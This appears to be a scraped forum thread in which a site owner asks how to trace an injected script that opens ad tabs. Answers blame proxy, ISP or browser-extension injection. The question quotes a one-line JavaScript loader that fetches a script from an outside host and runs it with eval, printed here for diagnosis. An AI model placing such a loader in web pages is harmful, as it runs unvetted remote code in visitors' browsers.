Menu
I'm a little bit lost on this issue, so please excuse me. I know there are other threads on SO about this but I can't find the answer.
On the site when it's loaded it doesn't matter where the user click it is open addition tab in browser with ads.
What I was able to find so far by looking at the browser console is that is loaded some js file
http://cdn.mecash.ru/js/replace.js
This file contain
!function(w){if(w.self==w.top){var r=new XMLHttpRequest;r.onload=function(){eval(this.responseText)},r.open("get","//myclk.net/js/tx.js",!0),r.send()}}(window);
and by looking at this tx.js I suspect that this is the injected by the hacker.
The problem is that I've been looking at the files on the host and can't find any include or something of this js..
Can someone help me and tell where or probably how can I find it?
777
Actually such kind of files are injected when the data is transmitted from server to client. Your actual code dosen't contains the script but, they are injected and executes on client machine..
Possibly injected by :
You can avoid proxy/ISP injecting by transferring content over https instead of http. However, injecting done by browswer extensions can be avoided by uninstalling extensions only.
183
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With
